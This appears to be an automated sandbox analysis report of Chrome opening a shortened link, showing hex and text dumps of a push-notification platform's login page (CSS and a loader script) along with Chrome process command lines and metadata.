                              vary: Access-Control-Request-Method
                              vary: Access-Control-Request-Headers
                              last-modified: Thu, 25 Apr 2024 10:28:10 GMT
                              x-content-type-options: nosniff
                              permissions-policy: camera=(), fullscreen=(self), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), sync-xhr=()
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mZ2a3KzESF1kpnOX1xwzpSWNFRruOIhD4%2BOR%2FA%2FK%2F7NHTLDRlXec41pWFptuaKYhuLZgSCVzZrUbnkIkwVEvOTbUT9NZwpgdXcsRi4qd8KcYpUYB%2B0rhKdfxqM%2BU1pP7ho4HwAoA3y9A"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              2024-04-25 18:22:20 UTC62INData Raw: 43 46 2d 52 41 59 3a 20 38 37 61 30 35 62 61 30 37 65 35 39 62 30 65 31 2d 41 54 4c 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                              Data Ascii: CF-RAY: 87a05ba07e59b0e1-ATLalt-svc: h3=":443"; ma=86400
                              2024-04-25 18:22:20 UTC1369INData Raw: 34 33 64 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 75 73 68 20 50 6c 61 74 66 6f 72 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 50 75 73 68 20 4e 6f 74 69 66 69 63 61 74 69 6f 6e 73 20 70 6c 61 74 66 6f 72 6d 22 3e 0a 20
                              Data Ascii: 43dc<!DOCTYPE html><html class="no-js" lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Push Platform</title> <meta name="description" content="Push Notifications platform">
                              2024-04-25 18:22:20 UTC1369INData Raw: 36 30 30 3a 23 34 33 35 38 36 32 3b 2d 2d 73 75 72 66 61 63 65 2d 37 30 30 3a 23 33 32 34 32 34 39 3b 2d 2d 73 75 72 66 61 63 65 2d 38 30 30 3a 23 32 32 32 63 33 31 3b 2d 2d 73 75 72 66 61 63 65 2d 39 30 30 3a 23 31 31 31 36 31 38 3b 2d 2d 67 72 61 79 2d 35 30 3a 23 65 65 66 31 66 32 3b 2d 2d 67 72 61 79 2d 31 30 30 3a 23 64 64 65 32 65 34 3b 2d 2d 67 72 61 79 2d 32 30 30 3a 23 62 62 63 35 63 61 3b 2d 2d 67 72 61 79 2d 33 30 30 3a 23 39 38 61 38 61 66 3b 2d 2d 67 72 61 79 2d 34 30 30 3a 23 37 36 38 62 39 35 3b 2d 2d 67 72 61 79 2d 35 30 30 3a 23 35 34 36 65 37 61 3b 2d 2d 67 72 61 79 2d 36 30 30 3a 23 34 33 35 38 36 32 3b 2d 2d 67 72 61 79 2d 37 30 30 3a 23 33 32 34 32 34 39 3b 2d 2d 67 72 61 79 2d 38 30 30 3a 23 32 32 32 63 33 31 3b 2d 2d 67 72 61 79 2d
                              Data Ascii: 600:#435862;--surface-700:#324249;--surface-800:#222c31;--surface-900:#111618;--gray-50:#eef1f2;--gray-100:#dde2e4;--gray-200:#bbc5ca;--gray-300:#98a8af;--gray-400:#768b95;--gray-500:#546e7a;--gray-600:#435862;--gray-700:#324249;--gray-800:#222c31;--gray-
                              2024-04-25 18:22:20 UTC1369INData Raw: 79 61 6e 2d 39 30 30 3a 23 31 32 34 35 35 35 3b 2d 2d 70 69 6e 6b 2d 35 30 3a 23 66 64 66 34 66 39 3b 2d 2d 70 69 6e 6b 2d 31 30 30 3a 23 66 36 63 63 65 30 3b 2d 2d 70 69 6e 6b 2d 32 30 30 3a 23 65 65 61 33 63 37 3b 2d 2d 70 69 6e 6b 2d 33 30 30 3a 23 65 37 37 61 61 65 3b 2d 2d 70 69 6e 6b 2d 34 30 30 3a 23 64 66 35 32 39 36 3b 2d 2d 70 69 6e 6b 2d 35 30 30 3a 23 64 38 32 39 37 64 3b 2d 2d 70 69 6e 6b 2d 36 30 30 3a 23 62 38 32 33 36 61 3b 2d 2d 70 69 6e 6b 2d 37 30 30 3a 23 39 37 31 64 35 38 3b 2d 2d 70 69 6e 6b 2d 38 30 30 3a 23 37 37 31 37 34 35 3b 2d 2d 70 69 6e 6b 2d 39 30 30 3a 23 35 36 31 30 33 32 3b 2d 2d 69 6e 64 69 67 6f 2d 35 30 3a 23 66 34 66 36 66 64 3b 2d 2d 69 6e 64 69 67 6f 2d 31 30 30 3a 23 63 63 64 33 66 35 3b 2d 2d 69 6e 64 69 67 6f 2d
                              Data Ascii: yan-900:#124555;--pink-50:#fdf4f9;--pink-100:#f6cce0;--pink-200:#eea3c7;--pink-300:#e77aae;--pink-400:#df5296;--pink-500:#d8297d;--pink-600:#b8236a;--pink-700:#971d58;--pink-800:#771745;--pink-900:#561032;--indigo-50:#f4f6fd;--indigo-100:#ccd3f5;--indigo-
                              2024-04-25 18:22:20 UTC1369INData Raw: 38 32 34 31 30 3b 2d 2d 72 65 64 2d 37 30 30 3a 23 39 37 31 64 30 64 3b 2d 2d 72 65 64 2d 38 30 30 3a 23 37 37 31 37 30 61 3b 2d 2d 72 65 64 2d 39 30 30 3a 23 35 36 31 31 30 38 3b 2d 2d 70 72 69 6d 61 72 79 2d 35 30 3a 23 66 32 66 38 66 64 3b 2d 2d 70 72 69 6d 61 72 79 2d 31 30 30 3a 23 63 32 64 66 66 36 3b 2d 2d 70 72 69 6d 61 72 79 2d 32 30 30 3a 23 39 31 63 36 65 66 3b 2d 2d 70 72 69 6d 61 72 79 2d 33 30 30 3a 23 36 31 61 64 65 37 3b 2d 2d 70 72 69 6d 61 72 79 2d 34 30 30 3a 23 33 30 39 33 65 30 3b 2d 2d 70 72 69 6d 61 72 79 2d 35 30 30 3a 23 30 30 37 61 64 39 3b 2d 2d 70 72 69 6d 61 72 79 2d 36 30 30 3a 23 30 30 36 38 62 38 3b 2d 2d 70 72 69 6d 61 72 79 2d 37 30 30 3a 23 30 30 35 35 39 38 3b 2d 2d 70 72 69 6d 61 72 79 2d 38 30 30 3a 23 30 30 34 33 37
                              Data Ascii: 82410;--red-700:#971d0d;--red-800:#77170a;--red-900:#561108;--primary-50:#f2f8fd;--primary-100:#c2dff6;--primary-200:#91c6ef;--primary-300:#61ade7;--primary-400:#3093e0;--primary-500:#007ad9;--primary-600:#0068b8;--primary-700:#005598;--primary-800:#00437
                              2024-04-25 18:22:20 UTC1369INData Raw: 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 20 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 2d 2d 62 73 2d 66 6f 6e 74 2d 6d 6f 6e 6f 73 70 61 63 65 3a 53 46 4d 6f 6e 6f 2d 52 65 67 75 6c 61 72 2c 20 4d 65 6e 6c 6f 2c 20 4d 6f 6e 61 63 6f 2c 20 43 6f 6e 73 6f 6c 61 73 2c 20 22 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 22 2c 20 22 43 6f 75 72 69 65 72 20 4e 65 77 22 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 2d 2d 62 73 2d 67 72 61 64 69 65 6e 74 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 38 30 64 65 67 2c 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c
                              Data Ascii: al, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";--bs-font-monospace:SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;--bs-gradient:linear-gradient(180deg, rgba(255, 255, 255,
                              2024-04-25 18:22:20 UTC1369INData Raw: 68 65 69 67 68 74 3a 31 2e 32 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 33 37 35 72 65 6d 20 2b 20 31 2e 35 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 32 30 30 70 78 29 7b 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 7d 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 33 32 35 72 65 6d 20 2b 20 2e 39 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 32 30 30 70 78 29 7b 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 7d 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 33 72 65 6d 20 2b 20 2e 36 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 32 30 30 70 78 29 7b 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 35 72 65
                              Data Ascii: height:1.2}h1{font-size:calc(1.375rem + 1.5vw)}@media (min-width: 1200px){h1{font-size:2.5rem}}h2{font-size:calc(1.325rem + .9vw)}@media (min-width: 1200px){h2{font-size:2rem}}h3{font-size:calc(1.3rem + .6vw)}@media (min-width: 1200px){h3{font-size:1.75re
                              2024-04-25 18:22:20 UTC1369INData Raw: 20 20 20 20 20 20 20 76 61 72 20 68 65 61 64 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 73 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 6c 69 6e 6b 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 66 61 76 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 6c 69 6e 6b 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 73 73 2e 72 65 6c 20 3d 20 27 73 74 79 6c 65 73 68 65 65 74 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 73 73 2e 74 79 70 65 20 3d 20 27 74 65 78 74 2f 63 73 73 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 61 76 2e
                              Data Ascii: var head = document.getElementsByTagName('head')[0]; var css = document.createElement('link'); var fav = document.createElement('link'); css.rel = 'stylesheet'; css.type = 'text/css'; fav.
                              2024-04-25 18:22:20 UTC1369INData Raw: 61 73 68 62 6f 61 72 64 2e 64 6d 73 70 75 73 68 2e 63 6f 6d 27 20 7c 7c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 3d 3d 3d 20 27 64 65 6d 6f 2e 64 6d 73 70 75 73 68 2e 63 6f 6d 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 73 73 2e 68 72 65 66 20 3d 20 27 63 6f 6e 74 65 6e 74 2f 63 73 73 2f 6c 6f 61 64 69 6e 67 2d 64 6d 73 2e 63 73 73 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 66 61 76 2e 68 72 65 66 20 3d 20 27 66 61 76 69 63 6f 6e 2d 64 6d 73 2e 69 63 6f 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69
                              Data Ascii: ashboard.dmspush.com' || window.location.hostname.toLowerCase() === 'demo.dmspush.com' ) { css.href = 'content/css/loading-dms.css'; //fav.href = 'favicon-dms.ico'; } else if (window.locati
                              2024-04-25 18:22:20 UTC1369INData Raw: 75 6c 74 2d 6c 6f 67 6f 2d 62 6c 6f 63 6b 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 73 74 79 6c 65 3d 22 6c 65 66 74 3a 20 32 76 68 3b 20 74 6f 70 3a 20 30 3b 20 68 65 69 67 68 74 3a 20 32 76 68 3b 20 77 69 64 74 68 3a 20 30 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 6c 69 64 65 31 20 31 73 20 6c 69 6e 65 61 72 20 66 6f 72 77 61 72 64 73 20 69 6e 66 69 6e 69 74 65 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 73 74 79 6c 65 3d 22 72 69 67 68 74 3a 20 30 3b 20 74 6f 70 3a 20 32 76 68 3b 20 77 69 64 74 68 3a 20 32 76 68 3b 20 68 65 69 67 68 74 3a 20 30 3b
                              Data Ascii: ult-logo-block" style="display: none"> <div class="loader" style="left: 2vh; top: 0; height: 2vh; width: 0; animation: slide1 1s linear forwards infinite"></div> <div class="loader" style="right: 0; top: 2vh; width: 2vh; height: 0;


                              Click to jump to process

                              Click to jump to process

                              Click to jump to process

                              Target ID:0
                              Start time:20:21:59
                              Start date:25/04/2024
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                              Imagebase:0x7ff76e190000
                              File size:3'242'272 bytes
                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Target ID:2
                              Start time:20:22:02
                              Start date:25/04/2024
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2216,i,6873913864203263267,792881258309955960,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                              Imagebase:0x7ff76e190000
                              File size:3'242'272 bytes
                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Target ID:3
                              Start time:20:22:06
                              Start date:25/04/2024
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://clc.li/bsLRU"
                              Imagebase:0x7ff76e190000
                              File size:3'242'272 bytes
                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              No disassembly